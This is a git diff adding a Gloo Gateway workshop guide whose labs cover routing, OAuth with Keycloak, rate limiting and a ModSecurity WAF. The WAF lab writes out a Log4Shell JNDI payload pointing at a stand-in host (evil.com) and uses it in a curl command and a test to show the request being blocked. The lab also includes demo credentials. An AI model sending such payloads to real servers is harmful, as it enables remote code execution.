diff --git a/gloo-gateway/1-18/enterprise-istio-ambient/default/README.md b/gloo-gateway/1-18/enterprise-istio-ambient/default/README.md index b5d8a7c5b0..1269a0141c 100644 --- a/gloo-gateway/1-18/enterprise-istio-ambient/default/README.md +++ b/gloo-gateway/1-18/enterprise-istio-ambient/default/README.md @@ -881,7 +881,7 @@ helm repo update helm upgrade -i -n gloo-system \ gloo-gateway gloo-ee-helm/gloo-ee \ --create-namespace \ - --version 1.18.0-rc6 \ + --version 1.18.0 \ --kube-context $CLUSTER1 \ --set-string license_key=$LICENSE_KEY \ -f -< + + + +
+ +
+ +#
Gloo Gateway Workshop
+ + + +## Table of Contents +* [Introduction](#introduction) +* [Lab 1 - Deploy Gloo Gateway](#lab-1---deploy-gloo-gateway-) +* [Lab 2 - Deploy the httpbin demo app](#lab-2---deploy-the-httpbin-demo-app-) +* [Lab 3 - Expose the httpbin application through the gateway](#lab-3---expose-the-httpbin-application-through-the-gateway-) +* [Lab 4 - Delegate with control](#lab-4---delegate-with-control-) +* [Lab 5 - Modify the requests and responses](#lab-5---modify-the-requests-and-responses-) +* [Lab 6 - Split traffic between 2 backend services](#lab-6---split-traffic-between-2-backend-services-) +* [Lab 7 - Deploy Keycloak](#lab-7---deploy-keycloak-) +* [Lab 8 - Securing the access with OAuth](#lab-8---securing-the-access-with-oauth-) +* [Lab 9 - Use the transformation filter to manipulate headers](#lab-9---use-the-transformation-filter-to-manipulate-headers-) +* [Lab 10 - Apply rate limiting to the Gateway](#lab-10---apply-rate-limiting-to-the-gateway-) +* [Lab 11 - Use the Web Application Firewall filter](#lab-11---use-the-web-application-firewall-filter-) + + + +## Introduction + +Gloo Gateway is a feature-rich, fast, and flexible Kubernetes-native ingress controller and next-generation API gateway built on top of Envoy proxy and the Kubernetes Gateway API. + +Gloo Gateway is fully conformant with the Kubernetes Gateway API and extends its functionality with Solo’s custom Gateway APIs, such as `RouteOption`, `VirtualHostOption`, `Upstream`, `RateLimitConfig`, or `AuthConfig`. +These resources help to centrally configure routing, security, and resiliency rules for a specific component, such as a host, route, or gateway listener.
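For example, a `RouteOption` attaches such rules to an `HTTPRoute` through `targetRefs`. Here is a sketch with hypothetical names (the exact options schemas are covered in the labs):

```yaml
apiVersion: gateway.solo.io/v1
kind: RouteOption
metadata:
  name: example-options      # hypothetical name
  namespace: httpbin
spec:
  targetRefs:
  - group: gateway.networking.k8s.io
    kind: HTTPRoute
    name: httpbin            # hypothetical HTTPRoute to attach to
  options:
    headerManipulation:
      requestHeadersToAdd:
      - header:
          key: foo
          value: bar
```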
+ +These capabilities are grouped into two editions of Gloo Gateway: + +### Open source (OSS) Gloo Gateway + +Use Kubernetes Gateway API-native features and the following Gloo Gateway extensions to configure basic routing, security, and resiliency capabilities: + +* Access logging +* Buffering +* Cross-Origin Resource Sharing (CORS) +* Cross-Site Request Forgery (CSRF) +* Fault injection +* Header control +* Retries +* Timeouts +* Traffic tapping +* Transformations + +### Gloo Gateway Enterprise Edition + +In addition to the features provided by the OSS edition, many more features are available in the Enterprise Edition, including: + +* External authentication and authorization +* External processing +* Data loss prevention +* Developer portal +* JSON web token (JWT) +* Rate limiting +* Response caching +* Web Application Filters + +### Want to learn more about Gloo Gateway? + +In the labs that follow we present some of the common patterns that our customers use and provide a good entry point into the workings of Gloo Gateway. + +You can find more information about Gloo Gateway in the official documentation: . + + + + +## Lab 1 - Deploy Gloo Gateway + + + +Download Gloo Gateway packages: + +```bash +gsutil cp gs://gloo-ee-vm/1.18.0/gloo-control.deb . +gsutil cp gs://gloo-ee-vm/1.18.0/gloo-gateway.deb . +gsutil cp gs://gloo-ee-vm/1.18.0/gloo-extensions.deb . 
+``` + +Deploy Redis on Docker: + +```bash +docker run --name some-redis -d -p 6379:6379 redis +``` + +Deploy the different Gloo Gateway components: + +```bash +sudo dpkg -i gloo-control.deb +sudo dpkg -i gloo-gateway.deb +sudo dpkg -i gloo-extensions.deb +``` + +Update the configuration: + +```bash +sudo sed -i "s/GLOO_LICENSE_KEY=/GLOO_LICENSE_KEY=${LICENSE_KEY}/" /etc/gloo/gloo-controller.env +sudo sed -i 's/GATEWAY_NAME=http-gateway/GATEWAY_NAME=http/' /etc/gloo/gloo-gateway.env +sudo sed -i 's/GATEWAY_NAMESPACE=default/GATEWAY_NAMESPACE=gloo-system/' /etc/gloo/gloo-gateway.env +sudo sed -i 's/CONTROLLER_HOST=gloo.gloo-system.svc.cluster.local/CONTROLLER_HOST=127.0.0.1/' /etc/gloo/gloo-gateway.env +sudo sed -i 's/GLOO_ADDRESS=gloo.gloo-system.svc.cluster.local/GLOO_ADDRESS=127.0.0.1/' /etc/gloo/gloo-extauth.env +sudo sed -i 's/HEALTH_HTTP_PORT=8084/HEALTH_HTTP_PORT=8085/' /etc/gloo/gloo-extauth.env +sudo sed -i 's/GLOO_ADDRESS=gloo.gloo-system.svc.cluster.local/GLOO_ADDRESS=127.0.0.1/' /etc/gloo/gloo-ratelimiter.env +``` + +Restart the services: + +```bash +sudo systemctl restart gloo-apiserver +sudo systemctl restart gloo-controller +sudo systemctl restart gloo-gateway +sudo systemctl restart gloo-extauth +sudo systemctl restart gloo-ratelimiter +``` + +The `gloo-control` package includes a `gloo-apiserver` service which provides a Kubernetes API server.
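For reference, after the `sed` edits above the touched entries in the environment files should read as follows (a sketch; only the modified keys are shown):

```
# /etc/gloo/gloo-gateway.env
GATEWAY_NAME=http
GATEWAY_NAMESPACE=gloo-system
CONTROLLER_HOST=127.0.0.1

# /etc/gloo/gloo-extauth.env
GLOO_ADDRESS=127.0.0.1
HEALTH_HTTP_PORT=8085

# /etc/gloo/gloo-ratelimiter.env
GLOO_ADDRESS=127.0.0.1
```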
+ +The `glooapi` CLI is used to interact with this Kubernetes API server, but the labs use `kubectl`, so we're going to create a shell function that automatically invokes `glooapi` instead: + + +Create a wrapper function to use `glooapi` instead of `kubectl`: + +```bash +kubectl() { + if [ "$1" = "apply" ] && [ "$2" = "--context" ] && [ "$3" = "${CLUSTER1}" ]; then + shift 3 + command glooapi apply "$@" + elif [ "$1" = "create" ] && [ "$2" = "--context" ] && [ "$3" = "${CLUSTER1}" ]; then + shift 3 + command glooapi create "$@" + elif [ "$1" = "delete" ] && [ "$2" = "--context" ] && [ "$3" = "${CLUSTER1}" ]; then + shift 3 + command glooapi delete "$@" + else + command glooapi "$@" + fi +} +``` + + +Set the context environment variable: + +```bash +export CLUSTER1=cluster1 +``` + + + +## Lab 2 - Deploy the httpbin demo app + +We're going to deploy the httpbin application to demonstrate several features of Gloo Gateway. + +You can find more information about this application [here](http://httpbin.org/). + +Run the following commands to deploy the httpbin app twice (`httpbin1` and `httpbin2`). + +```bash +kubectl create --context ${CLUSTER1} ns httpbin + +docker run --name httpbin1 --hostname httpbin1 -d -p 8881:8080 mccutchen/go-httpbin:v2.14.0 /bin/go-httpbin -use-real-hostname +docker run --name httpbin2 --hostname httpbin2 -d -p 8882:8080 mccutchen/go-httpbin:v2.14.0 /bin/go-httpbin -use-real-hostname +``` + + + +We'll also create `Upstream` objects corresponding to these services: + +```bash +kubectl apply --context ${CLUSTER1} -f - < + + + + +The team in charge of the gateway can create a `Gateway` resource and configure an HTTP listener. + + +But the gateway is going to listen on ports 8080 and 8443, so we need to redirect traffic from port 80 to port 8080, and from port 443 to port 8443.
+ +```bash +# Expose the port 8080 on port 80 +sudo bash -c 'cat </etc/systemd/system/glooproxy-80.service +[Unit] +Description=HTTP Proxy +After=multi-user.target + +[Service] +Restart=always +RestartSec=5s +ExecStart=/usr/bin/socat tcp-l:80,fork,reuseaddr tcp:127.0.0.1:8080 + +[Install] +WantedBy=multi-user.target +EOF' + +# Expose the port 8443 on port 443 +sudo bash -c 'cat </etc/systemd/system/glooproxy-443.service +[Unit] +Description=HTTPS Proxy +After=multi-user.target + +[Service] +Restart=always +RestartSec=5s +ExecStart=/usr/bin/socat tcp-l:443,fork,reuseaddr tcp:127.0.0.1:8443 + +[Install] +WantedBy=multi-user.target +EOF' + +sudo systemctl daemon-reload +sudo systemctl enable glooproxy-80 +sudo systemctl start glooproxy-80 +sudo systemctl enable glooproxy-443 +sudo systemctl start glooproxy-443 +``` + + +```bash +kubectl apply --context ${CLUSTER1} -f - < + +Configure your hosts file to resolve httpbin.example.com with the IP address of the proxy by executing the following command: + +```bash +./scripts/register-domain.sh httpbin.example.com ${PROXY_IP} +``` + +Try to access the application through HTTP: + +```shell +curl http://httpbin.example.com/get +``` + +Here is the expected output: + +```json,nocopy +{ + "args": {}, + "headers": { + "Accept": [ + "*/*" + ], + "Host": [ + "httpbin.example.com" + ], + "User-Agent": [ + "curl/8.5.0" + ], + "X-Forwarded-Proto": [ + "http" + ], + "X-Request-Id": [ + "d0998a48-7532-4eeb-ab69-23cef22185cf" + ] + }, + "method": "GET", + "origin": "127.0.0.6:38917", + "url": "http://httpbin.example.com/get" +} +``` + + + +Now, let's secure the access through TLS. 
+Let's first create a private key and a self-signed certificate: + +```bash +openssl req -x509 -nodes -days 365 -newkey rsa:2048 \ + -keyout tls.key -out tls.crt -subj "/CN=*" +``` + +Then, you have to store it in a Kubernetes secret running the following command: + +```bash +kubectl create --context ${CLUSTER1} -n gloo-system secret tls tls-secret --key tls.key \ + --cert tls.crt +``` + +Update the `Gateway` resource to add HTTPS listeners. + +```bash +kubectl apply --context ${CLUSTER1} -f - < + +```shell +curl -k https://httpbin.example.com/get +``` + +Here is the expected output: + +```json,nocopy +{ + "args": {}, + "headers": { + "Accept": [ + "*/*" + ], + "Host": [ + "httpbin.example.com" + ], + "User-Agent": [ + "curl/8.5.0" + ], + "X-Forwarded-Proto": [ + "https" + ], + "X-Request-Id": [ + "8e61c480-6373-4c38-824b-2bfe89e79d0c" + ] + }, + "method": "GET", + "origin": "127.0.0.6:52655", + "url": "https://httpbin.example.com/get" +} +``` + + + +The team in charge of the gateway can create an `HTTPRoute` to automatically redirect HTTP to HTTPS: + +```bash +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const helpersHttp = require('./tests/chai-http'); + +describe("location header correctly set", () => { + it('Checking text \'location\'', () => helpersHttp.checkHeaders({ host: `http://httpbin.example.com`, path: '/get', expectedHeaders: [{'key': 'location', 'value': `https://httpbin.example.com/get`}]})); +}) +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/expose-httpbin/tests/redirect-http-to-https.test.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> + + + + +## Lab 4 - Delegate with control + +The team in charge of the gateway can create a parent `HTTPRoute` to delegate the routing of a domain or a path prefix (for example) to an application team. 
+ +```bash +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const helpersHttp = require('./tests/chai-http'); + +describe("httpbin through HTTPS", () => { + it('Checking text \'headers\'', () => helpersHttp.checkBody({ host: `https://httpbin.example.com`, path: '/get', body: 'headers', match: true })); +}) +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/delegation/tests/https.test.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> + +In the previous example, we've used a simple `/` prefix matcher for both the parent and the child `HTTPRoute`. + +But we'll often use the delegation capability to delegate a specific path to an application team. + +For example, let's say the team in charge of the gateway wants to delegate the `/status` prefix to the team in charge of the httpbin application. + +Let's update the parent `HTTPRoute`: + +```bash +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const helpersHttp = require('./tests/chai-http'); + +describe("httpbin through HTTPS", () => { + it('Checking \'200\' status code', () => helpersHttp.checkURL({ host: `https://httpbin.example.com`, path: '/status/200', retCode: 200 })); +}) +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/delegation/tests/status-200.test.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> + +In the child `HTTPRoute`, we've indicated the absolute path (which includes the parent path), but instead we can inherit the parent matcher and use a relative path: + +```bash +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const helpersHttp = require('./tests/chai-http'); + +describe("httpbin through HTTPS", () => { + it('Checking \'200\' status code', () => helpersHttp.checkURL({ host:
`https://httpbin.example.com`, path: '/status/200', retCode: 200 })); +}) +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/delegation/tests/status-200.test.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> + +The team in charge of the httpbin application can also take advantage of the `parentRefs` option to indicate which parent `HTTPRoute` can delegate to its own `HTTPRoute`. + +That's why you don't need to use `ReferenceGrant` objects when using delegation. + +```bash +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const helpersHttp = require('./tests/chai-http'); + +describe("httpbin through HTTPS", () => { + it('Checking \'200\' status code', () => helpersHttp.checkURL({ host: `https://httpbin.example.com`, path: '/status/200', retCode: 200 })); +}) +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/delegation/tests/status-200.test.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> + +Delegation offers another very nice feature. It automatically reorders all the matchers to avoid any short-circuiting. + +Let's add a second child `HTTPRoute` that matches any request whose path starts with `/status`, but sends the requests to the second httpbin service.
+ +```bash +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const helpersHttp = require('./tests/chai-http'); + +describe("httpbin through HTTPS", () => { + it('Checking \'200\' status code', () => helpersHttp.checkURL({ host: `https://httpbin.example.com`, path: '/status/200', retCode: 200 })); +}) +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/delegation/tests/status-200.test.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> + +Check you can now also access the status `/status/201` path: + +```shell +curl -k https://httpbin.example.com/status/201 -w "%{http_code}" +``` + +Here is the expected output: + +```,nocopy +201 +``` + +You can use the following command to validate this request has been handled by the second httpbin application. + +```bash +docker logs httpbin2 | grep curl | grep 201 +``` + +You should get an output similar to: + +```log,nocopy +time="2024-07-22T16:04:53.3189" status=201 method="GET" uri="/status/201" size_bytes=0 duration_ms=0.02 user_agent="curl/7.81.0" client_ip=10.101.0.13:52424 +``` + + + +Let's delete the latest `HTTPRoute` and apply the original ones: + +```bash +kubectl delete --context ${CLUSTER1} -n httpbin httproute httpbin-status + +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const helpersHttp = require('./tests/chai-http'); + +describe("httpbin through HTTPS", () => { + it('Checking text \'headers\'', () => helpersHttp.checkBody({ host: `https://httpbin.example.com`, path: '/get', body: 'headers', match: true })); +}) +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/delegation/tests/https.test.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> + + + +## Lab 5 - Modify the requests and responses + +The Kubernetes 
Gateway API provides different options to add/update/remove request and response headers. + +Let's start with request headers. + +Update the `HTTPRoute` resource to do the following: +- add a new header `Foo` with the value `bar` +- update the value of the header `User-Agent` to `custom` +- remove the `To-Remove` header + +```bash +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const helpersHttp = require('./tests/chai-http'); + +describe("request transformations applied", () => { + it('Checking text \'bar\'', () => helpersHttp.checkBody({ host: `https://httpbin.example.com`, path: '/get', body: 'bar', match: true })); + it('Checking text \'custom\'', () => helpersHttp.checkBody({ host: `https://httpbin.example.com`, path: '/get', body: 'custom', match: true })); + it('Checking text \'To-Remove\'', () => helpersHttp.checkBody({ host: `https://httpbin.example.com`, path: '/get', body: 'To-Remove', match: false })); +}) +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/transformations/tests/request-headers.test.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> + +Another typical use case is to rewrite the hostname or the path before sending the request to the backend. 
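In the Kubernetes Gateway API, such a rewrite is expressed with the `URLRewrite` filter. The relevant rule fragment looks like this (filter only, not a complete `HTTPRoute`):

```yaml
filters:
- type: URLRewrite
  urlRewrite:
    hostname: httpbin1.com
    path:
      type: ReplaceFullPath
      replaceFullPath: /get
```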
+ +Update the `HTTPRoute` resource to do the following: +- rewrite the hostname to `httpbin1.com` +- rewrite the path to `/get` + +```bash +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const helpersHttp = require('./tests/chai-http'); + +describe("request rewrite applied", () => { + it('Checking text \'httpbin1.com/get\'', () => helpersHttp.checkBody({ host: `https://httpbin.example.com`, path: '/publicget', body: 'httpbin1.com/get', match: true })); +}) +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/transformations/tests/request-rewrite.test.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> + + +Let's now apply transformations to response headers. + +Update the `HTTPRoute` resource to do the following: +- add a new header `Foo` with the value `bar` +- update the value of the header `To-Modify` to `newvalue` +- remove the `To-Remove` header + +```bash +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const helpersHttp = require('./tests/chai-http'); + +describe("response transformations applied", () => { + it('Checking \'Foo\' and \'To-Modify\' headers', () => helpersHttp.checkHeaders({ host: `https://httpbin.example.com`, path: '/response-headers?to-remove=whatever&to-modify=oldvalue', expectedHeaders: [{'key': 'foo', 'value': 'bar'}, {'key': 'to-modify', 'value': 'newvalue'}]})); + it('Checking text \'To-Remove\'', () => helpersHttp.checkBody({ host: `https://httpbin.example.com`, path: '/response-headers?to-remove=whatever&to-modify=oldvalue', body: 'To-Remove', match: false })); +}) +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/transformations/tests/response-headers.test.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> + +Let's apply the original 
`HTTPRoute` yaml: + +```bash +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const helpersHttp = require('./tests/chai-http'); + +describe("request transformation applied", () => { + it('Checking text \'X-Client\'', () => helpersHttp.checkBody({ host: `https://httpbin.example.com`, path: '/get', headers: [{key: 'User-agent', value: 'curl/8.5.0'}], body: 'X-Client', match: true })); +}) +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/transformations/tests/x-client-request-header.test.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> + +As you can see, we've created a new header called `X-Client` by extracting some data from the `User-Agent` header using a regular expression. + +And we've targeted the `HTTPRoute` using the `targetRefs` of the `RouteOption` object. With this approach, it applies to all its rules. + +Another nice capability of the Gloo Gateway transformation filter is the ability to add a response header from some information present in the request. + +For example, we can add an `X-Request-Id` response header with the same value as the `X-Request-Id` request header. The user could use this information to report an issue they had with a specific request, for example.
+ +```bash +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const helpersHttp = require('./tests/chai-http'); + +describe("response transformation applied", () => { + it('Checking \'X-Request-Id\' header', () => helpersHttp.checkHeaders({ host: `https://httpbin.example.com`, path: '/get', expectedHeaders: [{'key': 'x-request-id', 'value': '*'}]})); +}) +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/transformations/tests/x-request-id-response-header.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> + +Let's apply the original `HTTPRoute` yaml: + +```bash +kubectl apply --context ${CLUSTER1} -f - < + +You can split traffic between different backends, with different weights. + +It's useful to slowly introduce a new version. + +Update the `HTTPRoute` resource to do the following: +- send 90% of the traffic to the `httpbin1` service +- send 10% of the traffic to the `httpbin2` service + +```bash +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const helpersHttp = require('./tests/chai-http'); + +describe("traffic split applied", () => { + it('Checking text \'httpbin1\'', () => helpersHttp.checkBody({ host: `https://httpbin.example.com`, path: '/hostname', body: 'httpbin1', match: true })); + it('Checking text \'httpbin2\'', () => helpersHttp.checkBody({ host: `https://httpbin.example.com`, path: '/hostname', body: 'httpbin2', match: true })); +}) +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/traffic-split/tests/traffic-split.test.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> + + + + +## Lab 7 - Deploy Keycloak + +In many use cases, you need to restrict the access to your applications to authenticated users. 
+ +OpenID Connect (OIDC) is an identity layer on top of the OAuth 2.0 protocol. In OAuth 2.0 flows, authentication is performed by an external Identity Provider (IdP) which, in case of success, returns an Access Token representing the user identity. The protocol does not define the contents and structure of the Access Token, which greatly reduces the portability of OAuth 2.0 implementations. + +The goal of OIDC is to address this ambiguity by additionally requiring Identity Providers to return a well-defined ID Token. OIDC ID tokens follow the JSON Web Token standard and contain specific fields that your applications can expect and handle. This standardization allows you to switch between Identity Providers – or support multiple ones at the same time – with minimal, if any, changes to your downstream services; it also allows you to consistently apply additional security measures like Role-Based Access Control (RBAC) based on the identity of your users, i.e. the contents of their ID token. + +In this lab, we're going to install Keycloak. It will allow us to set up OIDC workflows later. + +First, we need to define an ID and secret for a "client", which will be the service that delegates to Keycloak for authorization: + +```bash +KEYCLOAK_CLIENT=gloo-ext-auth +KEYCLOAK_SECRET=hKcDcqmUKCrPkyDJtCw066hTLzUbAiri +``` + +We need to store these in a secret accessible by the ext auth service: + +```bash +kubectl apply --context ${CLUSTER1} -f - < + +In this step, we're going to secure the access to the `httpbin` service using OAuth. + +First, we need to create an `AuthConfig`, which is a CRD that contains authentication information. We've already got a secret named `oauth` that we can reference in this policy: + +```bash +kubectl apply --context ${CLUSTER1} -f - < + + + + +If you refresh the web browser, you will be redirected to the authentication page. + +If you use the username `user1` and the password `password`, you should be redirected back to the `httpbin` application.
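The ID Token returned by Keycloak is a JWT: three dot-separated, base64url-encoded segments (`header.payload.signature`). The payload can be inspected without any JWT library; here is a sketch using a made-up payload (a real token also strips the trailing `=` padding, which would need to be restored before decoding):

```shell
# Hypothetical ID-token payload, for illustration only (not a real Keycloak token)
payload='{"iss":"https://keycloak.example.com/realms/workshop","email":"user2@solo.io"}'

# Assemble a JWT-shaped string: header.payload.signature
token="fakeheader.$(printf '%s' "$payload" | base64 | tr -d '\n' | tr '+/' '-_').fakesignature"

# Extract the second segment, undo the base64url substitutions, and decode it back to JSON
printf '%s' "$token" | cut -d. -f2 | tr '_-' '/+' | base64 -d
```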
+ +Notice that we are also extracting information from the `email` claim, and putting it into a new header. This can be used for different things during our authz/authn flow, but most importantly we don't need any jwt-decoding library in the application anymore! + +You can also perform authorization using OPA. + +First, you need to create a `ConfigMap` with the policy written in rego: + +```bash +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const helpersHttp = require('./tests/chai-http'); + +describe("Authentication is working properly", function () { + + const cookieString_user1 = process.env.USER1_COOKIE; + const cookieString_user2 = process.env.USER2_COOKIE; + + it("The httpbin page isn't accessible with user1", () => helpersHttp.checkURL({ host: `https://httpbin.example.com`, path: '/get', headers: [{ key: 'Cookie', value: cookieString_user1 }], retCode: "keycloak-session=dummy" == cookieString_user1 ? 302 : 403 })); + it("The httpbin page is accessible with user2", () => helpersHttp.checkURL({ host: `https://httpbin.example.com`, path: '/get', headers: [{ key: 'Cookie', value: cookieString_user2 }], retCode: 200 })); + +}); + +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/extauth-oauth/tests/authorization.test.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> +If you open the browser in incognito and login using the username `user2` and the password `password`, you will now be able to access it since the user's email ends with `@solo.io`. + + + + +## Lab 9 - Use the transformation filter to manipulate headers + + +In this step, we're going to use a regular expression to extract a part of an existing header and to create a new one: + +Let's update the `RouteOption` to extract the domain name from the email of the user. 
+ +```bash +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const helpersHttp = require('./tests/chai-http'); + +describe("Transformation is working properly", function() { + const cookieString = process.env.USER2_COOKIE; + it('The new header has been added', () => helpersHttp.checkBody({ host: `https://httpbin.example.com`, path: '/get', headers: [{ key: 'Cookie', value: cookieString }], body: 'X-Organization' })); +}); + +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/advanced-transformations/tests/header-added.test.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> + + + +## Lab 10 - Apply rate limiting to the Gateway + +In this step, we're going to apply rate limiting to the Gateway to only allow 3 requests per minute for the users of the `solo.io` organization. + +First, we need to create a `RateLimitConfig` object to define the limits: + +```bash +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const helpersHttp = require('./tests/chai-http'); + +describe("Rate limiting is working properly", function() { + const cookieString = process.env.USER2_COOKIE; + it('The httpbin page should be rate limited', () => helpersHttp.checkURL({ host: `https://httpbin.example.com`, path: '/get', headers: [{ key: 'Cookie', value: cookieString }], retCode: 429 })); +}); + +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/ratelimiting/tests/rate-limited.test.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> + +You should get a `200` response code the first 3 times and a `429` response code after. 
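The counting behavior can be sketched in a few lines of shell (purely illustrative; the real counters live in the Gloo rate-limit service, backed by the Redis instance deployed earlier):

```shell
limit=3    # requests allowed per minute, as defined in the RateLimitConfig above
count=0
results=""

for i in 1 2 3 4 5; do
  count=$((count + 1))
  # Within the window, requests up to the limit pass; the rest are rejected
  if [ "$count" -le "$limit" ]; then code=200; else code=429; fi
  results="$results request_$i:$code"
  echo "request $i -> $code"
done
```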
+ +Let's apply the original `HTTPRoute` yaml: + +```bash +kubectl apply --context ${CLUSTER1} -f - < + +A web application firewall (WAF) protects web applications by monitoring, filtering, and blocking potentially harmful traffic and attacks that can overtake or exploit them. + +Gloo Gateway includes the ability to enable the ModSecurity Web Application Firewall for any incoming and outgoing HTTP connections. + +As an example, we'll show how Gloo Gateway can easily mitigate the Log4Shell vulnerability ([CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228)), which for many enterprises was a major ordeal that took weeks and months of updating all services. + +The Log4Shell vulnerability impacted all Java applications that used the log4j library (a common logging library) and that exposed an endpoint. You could exploit the vulnerability by simply making a request with a specific header. In the example below, we will show how to protect your services against the Log4Shell exploit. + +Using the Web Application Firewall capabilities, you can reject requests containing such headers. + +Log4Shell attacks operate by passing in a Log4j expression that could trigger a lookup to a remote server, like a JNDI identity service. The malicious expression might look something like this: `${jndi:ldap://evil.com/x}`. It might be passed to the service via a header, a request argument, or a request payload. What the attacker is counting on is that the vulnerable system will log that string using log4j without checking it. That's what triggers the destructive JNDI lookup and the ultimate execution of malicious code.
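ModSecurity rules follow the `SecRule VARIABLES "OPERATOR" "ACTIONS"` form: a set of variables to inspect, an operator to match them with, and a list of actions to take on a match. A rule blocking Log4Shell probes in any request header could look like the following sketch (the exact rule embedded in the `RouteOption` may differ):

```
SecRuleEngine On
SecRule REQUEST_HEADERS "@rx \$\{jndi:(ldap|ldaps|rmi|dns)://" \
  "id:1000,phase:1,deny,status:403,msg:'Log4Shell malicious payload'"
```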
+ +You need to create the following `RouteOption`: + +```bash +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const chaiExec = require("@jsdevtools/chai-exec"); +const helpersHttp = require('./tests/chai-http'); +var chai = require('chai'); +var expect = chai.expect; + +describe("WAF is working properly", function() { + it('The request has been blocked', () => helpersHttp.checkBody({ host: `https://httpbin.example.com`, path: '/get', headers: [{key: 'User-Agent', value: '${jndi:ldap://evil.com/x}'}], body: 'Log4Shell malicious payload' })); +}); +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/waf/tests/waf.test.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> + +Run the following command to simulate an attack: + +```bash +curl -H "User-Agent: \${jndi:ldap://evil.com/x}" -k "https://httpbin.example.com/get" -i +``` + +The request should be rejected: + +```http,nocopy +HTTP/2 403 +content-length: 27 +content-type: text/plain +date: Tue, 05 Apr 2022 10:20:06 GMT +server: istio-envoy + +Log4Shell malicious payload +``` + +Let's delete the `RouteOption` we've created: + +```bash +kubectl delete --context ${CLUSTER1} -n gloo-system routeoption waf +``` + + + + diff --git a/gloo-gateway/1-18/enterprise-vm/default/data/.gitkeep b/gloo-gateway/1-18/enterprise-vm/default/data/.gitkeep new file mode 100644 index 0000000000..e69de29bb2 diff --git a/gloo-gateway/1-18/enterprise-vm/default/data/steps/deploy-keycloak-docker/keycloak-realm.json 